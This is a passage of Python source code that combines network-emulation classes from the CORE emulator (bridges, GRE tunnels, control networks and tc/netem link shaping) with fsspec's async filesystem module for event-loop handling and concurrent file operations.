netif.net_client.create_interface(self.brname, netif.localname)
super().attach(netif)
def detach(self, netif: CoreInterface) -> None:
"""
Detach a network interface.
:param netif: network interface to detach
:return: nothing
"""
if self.up:
netif.net_client.delete_interface(self.brname, netif.localname)
super().detach(netif)
def linked(self, netif1: CoreInterface, netif2: CoreInterface) -> bool:
"""
Determine if the provided network interfaces are linked.
:param netif1: interface one
:param netif2: interface two
:return: True if interfaces are linked, False otherwise
"""
# check if the network interfaces are attached to this network
if self._netif[netif1.netifi] != netif1:
raise ValueError(f"inconsistency for netif {netif1.name}")
if self._netif[netif2.netifi] != netif2:
raise ValueError(f"inconsistency for netif {netif2.name}")
try:
linked = self._linked[netif1][netif2]
except KeyError:
if self.policy == "ACCEPT":
linked = True
elif self.policy == "DROP":
linked = False
else:
raise Exception(f"unknown policy: {self.policy}")
self._linked[netif1][netif2] = linked
return linked
def unlink(self, netif1: CoreInterface, netif2: CoreInterface) -> None:
"""
Unlink two interfaces, resulting in adding or removing ebtables
filtering rules.
:param netif1: interface one
:param netif2: interface two
:return: nothing
"""
with self._linked_lock:
if not self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = False
ebq.ebchange(self)
def link(self, netif1: CoreInterface, netif2: CoreInterface) -> None:
"""
Link two interfaces together, resulting in adding or removing
ebtables filtering rules.
:param netif1: interface one
:param netif2: interface two
:return: nothing
"""
with self._linked_lock:
if self.linked(netif1, netif2):
return
self._linked[netif1][netif2] = True
ebq.ebchange(self)
def linkconfig(
self,
netif: CoreInterface,
bw: float = None,
delay: float = None,
loss: float = None,
duplicate: float = None,
jitter: float = None,
netif2: CoreInterface = None,
devname: str = None,
) -> None:
"""
Configure link parameters by applying tc queuing disciplines on the interface.
:param netif: interface one
:param bw: bandwidth to set to
:param delay: packet delay to set to
:param loss: packet loss to set to
:param duplicate: duplicate percentage to set to
:param jitter: jitter to set to
:param netif2: interface two
:param devname: device name
:return: nothing
"""
if devname is None:
devname = netif.localname
tc = f"{TC_BIN} qdisc replace dev {devname}"
parent = "root"
changed = False
if netif.setparam("bw", bw):
# from tc-tbf(8): minimum value for burst is rate / kernel_hz
if bw is not None:
burst = max(2 * netif.mtu, bw / 1000)
# max IP payload
limit = 0xFFFF
tbf = f"tbf rate {bw} burst {burst} limit {limit}"
if bw > 0:
if self.up:
cmd = f"{tc} {parent} handle 1: {tbf}"
netif.host_cmd(cmd)
netif.setparam("has_tbf", True)
changed = True
elif netif.getparam("has_tbf") and bw <= 0:
if self.up:
cmd = f"{TC_BIN} qdisc delete dev {devname} {parent}"
netif.host_cmd(cmd)
netif.setparam("has_tbf", False)
# removing the parent removes the child
netif.setparam("has_netem", False)
changed = True
if netif.getparam("has_tbf"):
parent = "parent 1:1"
netem = "netem"
changed = max(changed, netif.setparam("delay", delay))
if loss is not None:
loss = float(loss)
changed = max(changed, netif.setparam("loss", loss))
if duplicate is not None:
duplicate = int(duplicate)
changed = max(changed, netif.setparam("duplicate", duplicate))
changed = max(changed, netif.setparam("jitter", jitter))
if not changed:
return
# jitter and delay use the same delay statement
if delay is not None:
netem += f" delay {delay}us"
if jitter is not None:
if delay is None:
netem += f" delay 0us {jitter}us 25%"
else:
netem += f" {jitter}us 25%"
if loss is not None and loss > 0:
netem += f" loss {min(loss, 100)}%"
if duplicate is not None and duplicate > 0:
netem += f" duplicate {min(duplicate, 100)}%"
delay_check = delay is None or delay <= 0
jitter_check = jitter is None or jitter <= 0
loss_check = loss is None or loss <= 0
duplicate_check = duplicate is None or duplicate <= 0
if all([delay_check, jitter_check, loss_check, duplicate_check]):
# possibly remove netem if it exists and parent queue wasn't removed
if not netif.getparam("has_netem"):
return
if self.up:
cmd = f"{TC_BIN} qdisc delete dev {devname} {parent} handle 10:"
netif.host_cmd(cmd)
netif.setparam("has_netem", False)
elif len(netem) > 1:
if self.up:
cmd = (
f"{TC_BIN} qdisc replace dev {devname} {parent} handle 10: {netem}"
)
netif.host_cmd(cmd)
netif.setparam("has_netem", True)
def linknet(self, net: CoreNetworkBase) -> CoreInterface:
"""
Link this bridge with another by creating a veth pair and installing
each device into each bridge.
:param net: network to link with
:return: created interface
"""
sessionid = self.session.short_session_id()
try:
_id = f"{self.id:x}"
except TypeError:
_id = str(self.id)
try:
net_id = f"{net.id:x}"
except TypeError:
net_id = str(net.id)
localname = f"veth{_id}.{net_id}.{sessionid}"
if len(localname) >= 16:
raise ValueError(f"interface local name {localname} too long")
name = f"veth{net_id}.{_id}.{sessionid}"
if len(name) >= 16:
raise ValueError(f"interface name {name} too long")
netif = Veth(self.session, None, name, localname, start=self.up)
self.attach(netif)
if net.up:
# this is similar to net.attach() but uses netif.name instead of localname
netif.net_client.create_interface(net.brname, netif.name)
i = net.newifindex()
net._netif[i] = netif
with net._linked_lock:
net._linked[netif] = {}
netif.net = self
netif.othernet = net
return netif
def getlinknetif(self, net: CoreNetworkBase) -> Optional[CoreInterface]:
"""
Return the interface that links this network with another network
(one that was linked using linknet()).
:param net: interface to get link for
:return: interface the provided network is linked to
"""
for netif in self.netifs():
if hasattr(netif, "othernet") and netif.othernet == net:
return netif
return None
def addrconfig(self, addrlist: List[str]) -> None:
"""
Set addresses on the bridge.
:param addrlist: address list
:return: nothing
"""
if not self.up:
return
for addr in addrlist:
self.net_client.create_address(self.brname, str(addr))
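# Illustrative sketch (not part of the original module): how linkconfig() above
# assembles the netem option string from the per-link parameters. Delay and
# jitter are expressed in microseconds; loss and duplicate are percentages
# capped at 100. The netem qdisc is attached under the tbf handle when a
# bandwidth limit is active, otherwise at the root.
def _example_netem_options(delay: float = None, jitter: float = None,
                           loss: float = None, duplicate: float = None) -> str:
    netem = "netem"
    if delay is not None:
        netem += f" delay {delay}us"
    if jitter is not None:
        netem += f" delay 0us {jitter}us 25%" if delay is None else f" {jitter}us 25%"
    if loss is not None and loss > 0:
        netem += f" loss {min(loss, 100)}%"
    if duplicate is not None and duplicate > 0:
        netem += f" duplicate {min(duplicate, 100)}%"
    return netem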
class GreTapBridge(CoreNetwork):
"""
A network consisting of a bridge with a gretap device for tunneling to
another system.
"""
def __init__(
self,
session: "Session",
remoteip: str = None,
_id: int = None,
name: str = None,
policy: str = "ACCEPT",
localip: str = None,
ttl: int = 255,
key: int = None,
start: bool = True,
server: "DistributedServer" = None,
) -> None:
"""
Create a GreTapBridge instance.
:param session: core session instance
:param remoteip: remote address
:param _id: object id
:param name: object name
:param policy: network policy
:param localip: local address
:param ttl: ttl value
:param key: gre tap key
:param start: start flag
:param server: remote server this node will run on,
default is None for localhost
"""
CoreNetwork.__init__(self, session, _id, name, False, server, policy)
self.grekey = key
if self.grekey is None:
self.grekey = self.session.id ^ self.id
self.localnum = None
self.remotenum = None
self.remoteip = remoteip
self.localip = localip
self.ttl = ttl
if remoteip is None:
self.gretap = None
else:
self.gretap = GreTap(
node=self,
session=session,
remoteip=remoteip,
localip=localip,
ttl=ttl,
key=self.grekey,
)
if start:
self.startup()
def startup(self) -> None:
"""
Creates a bridge and adds the gretap device to it.
:return: nothing
"""
super().startup()
if self.gretap:
self.attach(self.gretap)
def shutdown(self) -> None:
"""
Detach the gretap device and remove the bridge.
:return: nothing
"""
if self.gretap:
self.detach(self.gretap)
self.gretap.shutdown()
self.gretap = None
super().shutdown()
def addrconfig(self, addrlist: List[str]) -> None:
"""
Set the remote tunnel endpoint. This is a one-time method for
creating the GreTap device, which requires the remoteip at startup.
The first address in the provided list is the remote IP; the second,
if present, specifies the local IP.
:param addrlist: address list
:return: nothing
"""
if self.gretap:
raise ValueError(f"gretap already exists for {self.name}")
remoteip = addrlist[0].split("/")[0]
localip = None
if len(addrlist) > 1:
localip = addrlist[1].split("/")[0]
self.gretap = GreTap(
session=self.session,
remoteip=remoteip,
localip=localip,
ttl=self.ttl,
key=self.grekey,
)
self.attach(self.gretap)
def setkey(self, key: int) -> None:
"""
Set the GRE key used for the GreTap device. This needs to be set
prior to instantiating the GreTap device (before addrconfig).
:param key: gre key
:return: nothing
"""
self.grekey = key
class CtrlNet(CoreNetwork):
"""
Control network functionality.
"""
policy = "ACCEPT"
# base control interface index
CTRLIF_IDX_BASE = 99
DEFAULT_PREFIX_LIST = [
"172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
"172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
"172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
"172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
]
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
prefix: str = None,
hostid: int = None,
start: bool = True,
server: "DistributedServer" = None,
assign_address: bool = True,
updown_script: str = None,
serverintf: CoreInterface = None,
) -> None:
"""
Creates a CtrlNet instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param prefix: control network ipv4 prefix
:param hostid: host id
:param start: start flag
:param server: remote server this node will run on,
default is None for localhost
:param assign_address: True to assign an address to the bridge, False otherwise
:param updown_script: control network updown script to run
:param serverintf: server interface to add to the bridge
"""
self.prefix = netaddr.IPNetwork(prefix).cidr
self.hostid = hostid
self.assign_address = assign_address
self.updown_script = updown_script
self.serverintf = serverintf
super().__init__(session, _id, name, start, server)
def add_addresses(self, index: int) -> None:
"""
Add addresses used for created control networks.
:param index: starting address index
:return: nothing
"""
use_ovs = self.session.options.get_config("ovs") == "True"
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, utils.cmd)
net_client.create_address(self.brname, current)
servers = self.session.distributed.servers
for name in servers:
server = servers[name]
index -= 1
address = self.prefix[index]
current = f"{address}/{self.prefix.prefixlen}"
net_client = get_net_client(use_ovs, server.remote_cmd)
net_client.create_address(self.brname, current)
def startup(self) -> None:
"""
Startup functionality for the control network.
:return: nothing
:raises CoreCommandError: when there is a command exception
"""
if self.net_client.existing_bridges(self.id):
raise CoreError(f"old bridges exist for node: {self.id}")
super().startup()
logging.info("added control network bridge: %s %s", self.brname, self.prefix)
if self.hostid and self.assign_address:
self.add_addresses(self.hostid)
elif self.assign_address:
self.add_addresses(-2)
if self.updown_script:
logging.info(
"interface %s updown script (%s startup) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} startup")
if self.serverintf:
self.net_client.create_interface(self.brname, self.serverintf)
def shutdown(self) -> None:
"""
Control network shutdown.
:return: nothing
"""
if self.serverintf is not None:
try:
self.net_client.delete_interface(self.brname, self.serverintf)
except CoreCommandError:
logging.exception(
"error deleting server interface %s from bridge %s",
self.serverintf,
self.brname,
)
if self.updown_script is not None:
try:
logging.info(
"interface %s updown script (%s shutdown) called",
self.brname,
self.updown_script,
)
self.host_cmd(f"{self.updown_script} {self.brname} shutdown")
except CoreCommandError:
logging.exception("error issuing shutdown script shutdown")
super().shutdown()
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Do not include CtrlNet in link messages describing this session.
:param flags: message flags
:return: list of link data
"""
return []
class PtpNet(CoreNetwork):
"""
Peer to peer network node.
"""
policy = "ACCEPT"
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface, but limit attachment to two interfaces.
:param netif: network interface
:return: nothing
"""
if len(self._netif) >= 2:
raise ValueError(
"Point-to-point links support at most 2 network interfaces"
)
super().attach(netif)
def data(
self,
message_type: int,
lat: float = None,
lon: float = None,
alt: float = None,
source: str = None,
) -> NodeData:
"""
Do not generate a Node Message for point-to-point links. They are
built using a link message instead.
:param message_type: purpose for the data object we are creating
:param lat: latitude
:param lon: longitude
:param alt: altitude
:param source: source of node data
:return: node data object
"""
return None
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Build CORE API TLVs for a point-to-point link. One Link message
describes this network.
:param flags: message flags
:return: list of link data
"""
all_links = []
if len(self._netif) != 2:
return all_links
if1, if2 = self._netif.values()
unidirectional = 0
if if1.getparams() != if2.getparams():
unidirectional = 1
interface1_ip4 = None
interface1_ip4_mask = None
interface1_ip6 = None
interface1_ip6_mask = None
for address in if1.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if netaddr.valid_ipv4(ip):
interface1_ip4 = ip
interface1_ip4_mask = mask
else:
interface1_ip6 = ip
interface1_ip6_mask = mask
interface2_ip4 = None
interface2_ip4_mask = None
interface2_ip6 = None
interface2_ip6_mask = None
for address in if2.addrlist:
ip, _sep, mask = address.partition("/")
mask = int(mask)
if netaddr.valid_ipv4(ip):
interface2_ip4 = ip
interface2_ip4_mask = mask
else:
interface2_ip6 = ip
interface2_ip6_mask = mask
link_data = LinkData(
message_type=flags,
node1_id=if1.node.id,
node2_id=if2.node.id,
link_type=self.linktype,
unidirectional=unidirectional,
delay=if1.getparam("delay"),
bandwidth=if1.getparam("bw"),
per=if1.getparam("loss"),
dup=if1.getparam("duplicate"),
jitter=if1.getparam("jitter"),
interface1_id=if1.node.getifindex(if1),
interface1_mac=if1.hwaddr,
interface1_ip4=interface1_ip4,
interface1_ip4_mask=interface1_ip4_mask,
interface1_ip6=interface1_ip6,
interface1_ip6_mask=interface1_ip6_mask,
interface2_id=if2.node.getifindex(if2),
interface2_mac=if2.hwaddr,
interface2_ip4=interface2_ip4,
interface2_ip4_mask=interface2_ip4_mask,
interface2_ip6=interface2_ip6,
interface2_ip6_mask=interface2_ip6_mask,
)
all_links.append(link_data)
# build a 2nd link message for the upstream link parameters
# (swap if1 and if2)
if unidirectional:
link_data = LinkData(
message_type=0,
link_type=self.linktype,
node1_id=if2.node.id,
node2_id=if1.node.id,
delay=if2.getparam("delay"),
bandwidth=if2.getparam("bw"),
per=if2.getparam("loss"),
dup=if2.getparam("duplicate"),
jitter=if2.getparam("jitter"),
unidirectional=1,
interface1_id=if2.node.getifindex(if2),
interface2_id=if1.node.getifindex(if1),
)
all_links.append(link_data)
return all_links
class SwitchNode(CoreNetwork):
"""
Provides switch functionality within a core node.
"""
apitype = NodeTypes.SWITCH.value
policy = "ACCEPT"
type = "lanswitch"
class HubNode(CoreNetwork):
"""
Provides hub functionality within a core node, forwards packets to all bridge
ports by turning off MAC address learning.
"""
apitype = NodeTypes.HUB.value
policy = "ACCEPT"
type = "hub"
def startup(self) -> None:
"""
Startup for a hub node; disables MAC learning after the normal startup.
:return: nothing
"""
super().startup()
self.net_client.disable_mac_learning(self.brname)
class WlanNode(CoreNetwork):
"""
Provides wireless lan functionality within a core node.
"""
apitype = NodeTypes.WIRELESS_LAN.value
linktype = LinkTypes.WIRED.value
policy = "DROP"
type = "wlan"
def __init__(
self,
session: "Session",
_id: int = None,
name: str = None,
start: bool = True,
server: "DistributedServer" = None,
policy: str = None,
) -> None:
"""
Create a WlanNode instance.
:param session: core session instance
:param _id: node id
:param name: node name
:param start: start flag
:param server: remote server node
will run on, default is None for localhost
:param policy: wlan policy
"""
super().__init__(session, _id, name, start, server, policy)
# wireless and mobility models (BasicRangeModel, Ns2WaypointMobility)
self.model = None
self.mobility = None
def startup(self) -> None:
"""
Startup for a wlan node; disables MAC learning after the normal startup.
:return: nothing
"""
super().startup()
self.net_client.disable_mac_learning(self.brname)
def attach(self, netif: CoreInterface) -> None:
"""
Attach a network interface.
:param netif: network interface
:return: nothing
"""
super().attach(netif)
if self.model:
netif.poshook = self.model.position_callback
if netif.node is None:
return
x, y, z = netif.node.position.get()
# invokes any netif.poshook
netif.setposition(x, y, z)
def setmodel(self, model: "WirelessModelType", config: Dict[str, str]):
"""
Sets the mobility and wireless model.
:param model: wireless model to set to
:param config: configuration for model being set
:return: nothing
"""
logging.debug("node(%s) setting model: %s", self.name, model.name)
if model.config_type == RegisterTlvs.WIRELESS.value:
self.model = model(session=self.session, _id=self.id)
for netif in self.netifs():
netif.poshook = self.model.position_callback
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
self.updatemodel(config)
elif model.config_type == RegisterTlvs.MOBILITY.value:
self.mobility = model(session=self.session, _id=self.id)
self.mobility.update_config(config)
def update_mobility(self, config: Dict[str, str]) -> None:
if not self.mobility:
raise ValueError(f"no mobility set to update for node({self.id})")
self.mobility.update_config(config)
def updatemodel(self, config: Dict[str, str]) -> None:
if not self.model:
raise ValueError(f"no model set to update for node({self.id})")
logging.debug(
"node(%s) updating model(%s): %s", self.id, self.model.name, config
)
self.model.update_config(config)
for netif in self.netifs():
if netif.poshook and netif.node:
x, y, z = netif.node.position.get()
netif.poshook(netif, x, y, z)
def all_link_data(self, flags: int) -> List[LinkData]:
"""
Retrieve all link data.
:param flags: message flags
:return: list of link data
"""
all_links = super().all_link_data(flags)
if self.model:
all_links.extend(self.model.all_link_data(flags))
return all_links
class TunnelNode(GreTapBridge):
"""
Provides tunnel functionality in a core node.
"""
apitype = NodeTypes.TUNNEL.value
policy = "ACCEPT"
type = "tunnel"
|
asyn.py
|
import asyncio
import asyncio.events
import functools
import inspect
import os
import re
import sys
import threading
from contextlib import contextmanager
from glob import has_magic
from .callbacks import _DEFAULT_CALLBACK
from .exceptions import FSTimeoutError
from .spec import AbstractFileSystem
from .utils import PY36, is_exception, other_paths
private = re.compile("_[^_]")
async def _runner(event, coro, result, timeout=None):
timeout = timeout if timeout else None # convert 0 or 0.0 to None
if timeout is not None:
coro = asyncio.wait_for(coro, timeout=timeout)
try:
result[0] = await coro
except Exception as ex:
result[0] = ex
finally:
event.set()
if PY36:
grl = asyncio.events._get_running_loop
else:
grl = asyncio.events.get_running_loop
def sync(loop, func, *args, timeout=None, **kwargs):
"""
Make the given loop run the coroutine until it returns. Runs in another thread.
"""
timeout = timeout if timeout else None # convert 0 or 0.0 to None
# NB: if the loop is not running *yet*, it is OK to submit work
# and we will wait for it
if loop is None or loop.is_closed():
raise RuntimeError("Loop is not running")
try:
loop0 = grl()
if loop0 is loop:
raise NotImplementedError("Calling sync() from within a running loop")
except RuntimeError:
pass
coro = func(*args, **kwargs)
result = [None]
event = threading.Event()
asyncio.run_coroutine_threadsafe(_runner(event, coro, result, timeout), loop)
while True:
# this loop allows the thread to be interrupted
if event.wait(1):
break
if timeout is not None:
timeout -= 1
if timeout < 0:
raise FSTimeoutError
if isinstance(result[0], asyncio.TimeoutError):
# suppress asyncio.TimeoutError, raise FSTimeoutError
raise FSTimeoutError
if isinstance(result[0], BaseException):
raise result[0]
return result[0]
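# Illustrative sketch (not part of the original module): sync() is typically
# used to run a coroutine to completion on the dedicated fsspec IO loop (see
# get_loop() below) from ordinary blocking code.
def _example_sync_usage():
    async def _double(x):
        return x * 2
    # returns 42; raises FSTimeoutError if a timeout is given and exceeded
    return sync(get_loop(), _double, 21)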
iothread = [None] # dedicated fsspec IO thread
loop = [None] # global event loop for any non-async instance
lock = threading.Lock() # for setting exactly one thread
def sync_wrapper(func, obj=None):
"""Given a function, make so can be called in async or blocking contexts
Leave obj=None if defining within a class. Pass the instance if attaching
as an attribute of the instance.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = obj or args[0]
return sync(self.loop, func, *args, **kwargs)
return wrapper
@contextmanager
def _selector_policy():
original_policy = asyncio.get_event_loop_policy()
try:
if (
sys.version_info >= (3, 8)
and os.name == "nt"
and hasattr(asyncio, "WindowsSelectorEventLoopPolicy")
):
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
yield
finally:
asyncio.set_event_loop_policy(original_policy)
def get_running_loop():
if hasattr(asyncio, "get_running_loop"):
return asyncio.get_running_loop()
else:
loop = asyncio._get_running_loop()
if loop is None:
raise RuntimeError("no running event loop")
else:
return loop
def get_loop():
"""Create or return the default fsspec IO loop
The loop will be running on a separate thread.
"""
if loop[0] is None:
with lock:
# repeat the check just in case the loop got filled between the
# previous two calls from another thread
if loop[0] is None:
with _selector_policy():
loop[0] = asyncio.new_event_loop()
th = threading.Thread(target=loop[0].run_forever, name="fsspecIO")
th.daemon = True
th.start()
iothread[0] = th
return loop[0]
@contextmanager
def fsspec_loop():
"""Temporarily switch the current event loop to the fsspec's
own loop, and then revert it back after the context gets
terinated.
"""
try:
original_loop = get_running_loop()
except RuntimeError:
original_loop = None
fsspec_loop = get_loop()
try:
asyncio._set_running_loop(fsspec_loop)
yield fsspec_loop
finally:
asyncio._set_running_loop(original_loop)
try:
import resource
except ImportError:
resource = None
ResourceError = OSError
else:
ResourceError = resource.error
_DEFAULT_BATCH_SIZE = 128
def _get_batch_size():
from fsspec.config import conf
if "gather_batch_size" in conf:
return conf["gather_batch_size"]
if resource is None:
return _DEFAULT_BATCH_SIZE
try:
soft_limit, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
except (ImportError, ValueError, ResourceError):
return _DEFAULT_BATCH_SIZE
if soft_limit == resource.RLIM_INFINITY:
return -1
else:
return soft_limit // 8
async def _run_coros_in_chunks(
coros, batch_size=None, callback=_DEFAULT_CALLBACK, timeout=None
):
"""Run the given coroutines in smaller chunks to
not crossing the file descriptor limit.
If batch_size parameter is -1, then it will not be any throttling. If
it is none, it will be inferred from the process resources (soft limit divided
by 8) and fallback to 128 if the system doesn't support it."""
if batch_size is None:
batch_size = _get_batch_size()
if batch_size == -1:
batch_size = len(coros)
assert batch_size > 0
results = []
for start in range(0, len(coros), batch_size):
chunk = coros[start : start + batch_size]
for coro in asyncio.as_completed(chunk, timeout=timeout):
results.append(await coro)
callback.call("relative_update", 1)
return results
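# Illustrative sketch (not part of the original module): limiting how many of a
# large set of coroutines are awaited at once, so open file descriptors stay
# below the soft limit.
async def _example_run_in_chunks():
    async def fetch(i):
        return i * i
    coros = [fetch(i) for i in range(1000)]
    # batch_size=None would derive the limit from RLIMIT_NOFILE / 8 instead
    return await _run_coros_in_chunks(coros, batch_size=64)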
# these methods should be implemented as async by any async-able backend
async_methods = [
"_ls",
"_cat_file",
"_get_file",
"_put_file",
"_rm_file",
"_cp_file",
"_pipe_file",
"_expand_path",
"_info",
"_isfile",
"_isdir",
"_exists",
"_walk",
"_glob",
"_find",
"_du",
"_size",
"_mkdir",
"_makedirs",
]
class AsyncFileSystem(AbstractFileSystem):
"""Async file operations, default implementations
Passes bulk operations to asyncio.gather for concurrent operation.
Implementations that have concurrent batch operations and/or async methods
should inherit from this class instead of AbstractFileSystem. Docstrings are
copied from the un-underscored method in AbstractFileSystem, if not given.
"""
# note that methods do not have docstring here; they will be copied
# for _* methods and inferred for overridden methods.
async_impl = True
disable_throttling = False
def __init__(self, *args, asynchronous=False, loop=None, **kwargs):
self.asynchronous = asynchronous
self._pid = os.getpid()
if not asynchronous:
self._loop = loop or get_loop()
else:
self._loop = None
self.batch_size = kwargs.pop("batch_size", None)
super().__init__(*args, **kwargs)
@property
def loop(self):
if self._pid != os.getpid():
raise RuntimeError("This class is not fork-safe")
return self._loop
async def _rm_file(self, path, **kwargs):
raise NotImplementedError
async def _rm(self, path, recursive=False, **kwargs):
# TODO: implement on_error
path = await self._expand_path(path, recursive=recursive)
await asyncio.gather(*[self._rm_file(p, **kwargs) for p in path])
async def _copy(
self, path1, path2, recursive=False, on_error=None, maxdepth=None, **kwargs
):
if on_error is None and recursive:
on_error = "ignore"
elif on_error is None:
on_error = "raise"
paths = await self._expand_path(path1, maxdepth=maxdepth, recursive=recursive)
path2 = other_paths(paths, path2)
result = await asyncio.gather(
*[self._cp_file(p1, p2, **kwargs) for p1, p2 in zip(paths, path2)],
return_exceptions=True,
)
for ex in filter(is_exception, result):
if on_error == "ignore" and isinstance(ex, FileNotFoundError):
continue
raise ex
async def _pipe(self, path, value=None, **kwargs):
if isinstance(path, str):
path = {path: value}
await asyncio.gather(
*[self._pipe_file(k, v, **kwargs) for k, v in path.items()]
)
async def _process_limits(self, url, start, end):
"""Helper for "Range"-based _cat_file"""
size = None
suff = False
if start is not None and start < 0:
# if start is negative and end None, end is the "suffix length"
if end is None:
end = -start
start = ""
suff = True
else:
size = size or (await self._info(url))["size"]
start = size + start
elif start is None:
start = 0
if not suff:
if end is not None and end < 0:
if start is not None:
size = size or (await self._info(url))["size"]
end = size + end
elif end is None:
end = ""
if isinstance(end, int):
end -= 1 # bytes range is inclusive
return "bytes=%s-%s" % (start, end)
async def _cat_file(self, path, start=None, end=None, **kwargs):
raise NotImplementedError
async def _cat(self, path, recursive=False, on_error="raise", **kwargs):
paths = await self._expand_path(path, recursive=recursive)
out = await asyncio.gather(
*[self._cat_file(path, **kwargs) for path in paths],
return_exceptions=True,
)
if on_error == "raise":
ex = next(filter(is_exception, out), False)
if ex:
raise ex
if (
len(paths) > 1
or isinstance(path, list)
or paths[0] != self._strip_protocol(path)
):
return {
k: v
for k, v in zip(paths, out)
if on_error != "omit" or not is_exception(v)
}
else:
return out[0]
async def _put(
self, lpath, rpath, recursive=False, callback=_DEFAULT_CALLBACK, **kwargs
):
"""Copy file(s) from local.
Copies a specific file or tree of files (if recursive=True). If rpath
ends with a "/", it will be assumed to be a directory, and target files
will go within.
The put_file method will be called concurrently on a batch of files. The
batch_size option can configure the number of futures that can be executed
at the same time. If it is -1, then all the files will be uploaded concurrently.
The default can be set for this instance by passing "batch_size" in the
constructor, or for all instances by setting the "gather_batch_size" key
in ``fsspec.config.conf``, falling back to 1/8th of the system limit.
"""
from .implementations.local import LocalFileSystem, make_path_posix
rpath = self._strip_protocol(rpath)
if isinstance(lpath, str):
lpath = make_path_posix(lpath)
fs = LocalFileSystem()
lpaths = fs.expand_path(lpath, recursive=recursive)
rpaths = other_paths(lpaths, rpath)
is_dir = {l: os.path.isdir(l) for l in lpaths}
rdirs = [r for l, r in zip(lpaths, rpaths) if is_dir[l]]
file_pairs = [(l, r) for l, r in zip(lpaths, rpaths) if not is_dir[l]]
await asyncio.gather(*[self._makedirs(d, exist_ok=True) for d in rdirs])
batch_size = kwargs.pop("batch_size", self.batch_size)
coros = []
callback.call("set_size", len(file_pairs))
for lfile, rfile in file_pairs:
callback.branch(lfile, rfile, kwargs)
coros.append(self._put_file(lfile, rfile, **kwargs))
return await _run_coros_in_chunks(
coros, batch_size=batch_size, callback=callback
)
async def _get_file(self, rpath, lpath, **kwargs):
raise NotImplementedError
async def _get(
self, rpath, lpath, recursive=False, callback=_DEFAULT_CALLBACK, **kwargs
):
"""Copy file(s) to local.
Copies a specific file or tree of files (if recursive=True). If lpath
ends with a "/", it will be assumed to be a directory, and target files
will go within. Can submit a list of paths, which may be glob-patterns
and will be expanded.
The get_file method will be called concurrently on a batch of files. The
batch_size option can configure the number of futures that can be executed
at the same time. If it is -1, then all the files will be downloaded concurrently.
The default can be set for this instance by passing "batch_size" in the
constructor, or for all instances by setting the "gather_batch_size" key
in ``fsspec.config.conf``, falling back to 1/8th of the system limit.
"""
from fsspec.implementations.local import make_path_posix
rpath = self._strip_protocol(rpath)
lpath = make_path_posix(lpath)
rpaths = await self._expand_path(rpath, recursive=recursive)
lpaths = other_paths(rpaths, lpath)
[os.makedirs(os.path.dirname(lp), exist_ok=True) for lp in lpaths]
batch_size = kwargs.pop("batch_size", self.batch_size)
coros = []
callback.lazy_call("set_size", len, lpaths)
for lpath, rpath in zip(lpaths, rpaths):
callback.branch(rpath, lpath, kwargs)
coros.append(self._get_file(rpath, lpath, **kwargs))
return await _run_coros_in_chunks(
coros, batch_size=batch_size, callback=callback
)
async def _isfile(self, path):
try:
return (await self._info(path))["type"] == "file"
except: # noqa: E722
return False
async def _isdir(self, path):
try:
return (await self._info(path))["type"] == "directory"
except IOError:
return False
async def _size(self, path):
return (await self._info(path)).get("size", None)
async def _exists(self, path):
try:
await self._info(path)
return True
except FileNotFoundError:
return False
async def _info(self, path, **kwargs):
raise NotImplementedError
async def _ls(self, path, **kwargs):
raise NotImplementedError
async def _walk(self, path, maxdepth=None, **kwargs):
path = self._strip_protocol(path)
full_dirs = {}
dirs = {}
files = {}
detail = kwargs.pop("detail", False)
try:
listing = await self._ls(path, detail=True, **kwargs)
except (FileNotFoundError, IOError):
if detail:
yield path, {}, {}
else:
yield path, [], []
return
for info in listing:
# each info name must be at least [path]/part , but here
# we check also for names like [path]/part/
pathname = info["name"].rstrip("/")
name = pathname.rsplit("/", 1)[-1]
if info["type"] == "directory" and pathname != path:
# do not include "self" path
full_dirs[pathname] = info
dirs[name] = info
elif pathname == path:
# file-like with same name as given path
files[""] = info
else:
files[name] = info
if detail:
yield path, dirs, files
else:
yield path, list(dirs), list(files)
if maxdepth is not None:
maxdepth -= 1
if maxdepth < 1:
return
for d in full_dirs:
async for _ in self._walk(d, maxdepth=maxdepth, detail=detail, **kwargs):
yield _
async def _glob(self, path, **kwargs):
import re
ends = path.endswith("/")
path = self._strip_protocol(path)
indstar = path.find("*") if path.find("*") >= 0 else len(path)
indques = path.find("?") if path.find("?") >= 0 else len(path)
indbrace = path.find("[") if path.find("[") >= 0 else len(path)
ind = min(indstar, indques, indbrace)
detail = kwargs.pop("detail", False)
if not has_magic(path):
root = path
depth = 1
if ends:
path += "/*"
elif await self._exists(path):
if not detail:
return [path]
else:
return {path: await self._info(path)}
else:
if not detail:
return [] # glob of non-existent returns empty
else:
return {}
elif "/" in path[:ind]:
ind2 = path[:ind].rindex("/")
root = path[: ind2 + 1]
depth = None if "**" in path else path[ind2 + 1 :].count("/") + 1
else:
root = ""
depth = None if "**" in path else path[ind + 1 :].count("/") + 1
allpaths = await self._find(
root, maxdepth=depth, withdirs=True, detail=True, **kwargs
)
# Escape characters special to python regex, leaving our supported
# special characters in place.
# See https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html
# for shell globbing details.
pattern = (
"^"
+ (
path.replace("\\", r"\\")
.replace(".", r"\.")
.replace("+", r"\+")
.replace("//", "/")
.replace("(", r"\(")
.replace(")", r"\)")
.replace("|", r"\|")
.replace("^", r"\^")
.replace("$", r"\$")
.replace("{", r"\{")
.replace("}", r"\}")
.rstrip("/")
.replace("?", ".")
)
